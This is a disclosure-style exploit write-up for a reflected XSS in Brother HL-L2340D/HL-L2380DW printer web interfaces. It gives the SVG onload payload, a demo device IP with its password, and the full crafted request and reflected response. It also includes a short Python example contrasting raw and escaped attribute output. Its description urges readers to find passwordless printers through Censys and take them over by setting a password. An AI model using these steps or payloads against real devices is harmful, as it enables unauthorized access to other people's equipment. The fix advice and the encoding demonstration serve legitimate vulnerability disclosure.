# Exploit Title: [XSS at Brother HL-L2340D & HL-L2380DW series]
# Date: [30.05.2018]
# Exploit Author: [Huy Kha]
# Vendor Homepage: [http://support.brother.com]
# Software Link: [ Website ]
# Version: HL-L2340D & HL-L2380DW series
# Tested on: Mozilla Firefox
# Reflected XSS Payload :
"--!><Svg/OnLoad=(confirm)(1)>"
# Description : Start by searching for printers that have no password set.
https://censys.io/ipv4?q=HL-L2340D+series
https://censys.io/ipv4?q=HL-L2380DW+series
When you see a yellow bar reading ''Configure the password'', you can take
over the whole printer by setting a password on it.
# PoC :
This is a demo device. To execute the XSS you need to be
logged into the web interface first.
1. Go to the following url: http://128.12.201.40/
2. Login with ''HackMe123'' as password
3. Now visit the following parameter:
net/net/service_detail.html?service=1&pageid=236
4. The XSS vulnerability exists in the service_detail.html?service=1 parameter.
5. Demo URL: http://128.12.201.40/etc/loginerror.html?url=%2Fnet%2Fnet%2Fservice_detail.html%3Fservice%3D%2522--!%253E%253CSvg%2FOnLoad%3D(confirm)(1)%253E%2522%26pageid%3D241
# Request :
GET /etc/loginerror.html?url=%2Fnet%2Fnet%2Fservice_detail.html%3Fservice%3D%2522--!%253E%253CSvg%2FOnLoad%3D(confirm)(1)%253E%2522%26pageid%3D241 HTTP/1.1
Host: 128.12.201.40
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: nl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
# Response :
HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Length: 3389
Content-Type: text/html
Content-Language: nl
Connection: close
Server: debut/1.20
Pragma: no-cache

<?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC
"-//W3C//DTD XHTML 1.0 Strict//EN" "
http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html lang="nl" xmlns="
http://www.w3.org/1999/xhtml" xml:lang="nl"><head><meta
http-equiv="Content-Script-Type" content="text/javascript" /><meta
http-equiv="content-style-type" content="text/css" /><meta
http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /><script
type="text/javascript" src="/common/js/ews.js"></script> <link
rel="stylesheet" type="text/css" href="../common/css/common.css" /> <link
rel="stylesheet" type="text/css" href="../common/css/ews.css"
/><title>Brother HL-L2340D series</title></head><body><div
id="baseFrame"><div id="frameContainer"><div
id="headerFrameContainerLeft"><div id="headerFrameContainerRight"><div
id="headerFrameInner"><div id="headerFrame"><div
id="modelName"><h1>HL-L2340D series</h1><div class="SetBox"
id="SetBoxAuthRight"><div id="SetBoxAuthLeft"><form method="post"
action="/general/status.html"><div>Log in<input type="password"
id="LogBox" name="B1d6" /><input type="hidden" name="loginurl"
value="/net/net/service_detail.html?service="--!><Svg/OnLoad=(confirm)(1)>"&pageid=241"/><input
id="login" type="submit" value=" "
/></div></form></div></div></div><div id="corporateLogo"><img
src="/common/images/logo.gif" alt="Brother" /></div></div><div
id="solutions"><div><span><a href="
http://solutions.brother.com/cgi-bin/solutions.cgi?MDL=prn088&LNG=en&SRC=DEVICE">Brother<br
/>Solutions Center</a></span></div></div><div
id="tabMenu"><ul><li><ul><li
class="selected"><p>Algemeen</p></li></ul></li></ul></div></div></div></div><div
id="mainFrameContainer"><div id="mainFrameTopLeft"><div
id="mainFrameTopRight"><div id="mainFrameTopInner"><div
id="subTabMenu"> </div></div></div></div><div id="mainFrameInner"><div
id="subMenu"><div><a href="/general/status.html">Status</a></div><div><a
href="/general/reflesh.html"
class="subPage">Interval voor autom. vernieuwen</a></div><div><a
href="/general/information.html?kind=item">Onderhoudsinformatie</a></div><div><a
href="/general/lists.html">Lijsten/Rapporten</a></div><div><a
href="/general/find.html">Apparaat zoeken</a></div><div><a
href="/general/contact.html">Contactpersoon & locatie</a></div><div><a
href="/general/sleep.html">Slaapstand</a></div><div><a
href="/general/powerdown.html">Automatisch uitschakelen</a></div><div><a
href="/general/language.html">Taal</a></div><div><a
href="/general/panel.html">Paneel</a></div><div><a
href="/general/replacetoner.html">Toner vervangen</a></div></div><div
id="rightFrameContainer"><div id="rightFrame"><div id="mainContent"><div
id="pageTitle"><h2>Log in</h2></div><div id="pageContents"><div
class="contentsGroup"><p
class="noteMessage">Om deze pagina te openen moet u inloggen. Log in s.v.p.</p></div></div></div></div></div><script
type="text/javascript"><!-- SetMinHeight(); // --></script></div><div
id="mainFrameBottomLeft"><div id="mainFrameBottomRight"><div
id="mainFrameBottomInner"></div></div></div></div><div
id="footerFrameContainer"><div id="copyright">Copyright(C) 2000-2014
Brother Industries, Ltd. All Rights Reserved.</div><div id="topBack"><a
href="#">Top<img src="/common/images/ic_pt.gif" alt="Top"
/></a></div></div></div></div></body></html>
# How to fix it? :
This has nothing to do with which firmware version you use. Of course I would
suggest updating to the latest version, but if you want to fix it:
put a strong password on the printer's web interface.
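The captured response reflects the url parameter into the hidden loginurl input's value attribute without encoding, which is what lets the quote and tag in the payload break out of the attribute. As an added example (not Brother's firmware code), the following Python models that reflection next to an attribute-encoded version, checks each with an HTML parser, and shows how the double-encoded demo URL from the PoC decodes to the value seen in the response.

```python
import html
from html.parser import HTMLParser
from urllib.parse import parse_qs, unquote, urlparse

# Demo URL taken from the advisory above.
DEMO_URL = ("http://128.12.201.40/etc/loginerror.html?url=%2Fnet%2Fnet%2Fservice_detail.html"
            "%3Fservice%3D%2522--!%253E%253CSvg%2FOnLoad%3D(confirm)(1)%253E%2522%26pageid%3D241")

# The loginurl value exactly as it appears in the captured response body.
REFLECTED = '/net/net/service_detail.html?service="--!><Svg/OnLoad=(confirm)(1)>"&pageid=241'


def reflected_param(demo_url: str) -> str:
    """Recover the value the device ends up reflecting: parse_qs strips the
    outer URL encoding and a second unquote strips the inner one (%2522 -> %22 -> ")."""
    query = parse_qs(urlparse(demo_url).query)
    return unquote(query["url"][0])


def render_login_input_vulnerable(loginurl: str) -> str:
    """Models the flaw seen in the response: raw concatenation into an attribute."""
    return '<input type="hidden" name="loginurl" value="' + loginurl + '"/>'


def render_login_input_fixed(loginurl: str) -> str:
    """Hardened form: HTML-attribute-encode the value (&, <, >, " and ')."""
    return '<input type="hidden" name="loginurl" value="' + html.escape(loginurl, quote=True) + '"/>'


class TagCollector(HTMLParser):
    """Records every start tag with its attributes, in document order."""
    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append((tag, dict(attrs)))


def parse_tags(markup: str):
    parser = TagCollector()
    parser.feed(markup)
    parser.close()
    return parser.tags


def value_stays_in_attribute(markup: str, expected: str) -> bool:
    """True when the markup parses to exactly one <input> whose value attribute
    round-trips to the original parameter; False means the parameter altered
    the DOM (an extra element such as <svg>, or a truncated value)."""
    tags = parse_tags(markup)
    return len(tags) == 1 and tags[0][0] == "input" and tags[0][1].get("value") == expected
```

Running value_stays_in_attribute on both renderings shows the vulnerable markup producing a second element (svg with an onload attribute) while the encoded version keeps the whole payload inert inside the attribute.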
# Note: The vendor has been contacted on 30-5-2018.
Kind regards,
Huy Kha
https://twitter.com/huykha10
linkedin.com/in/huykha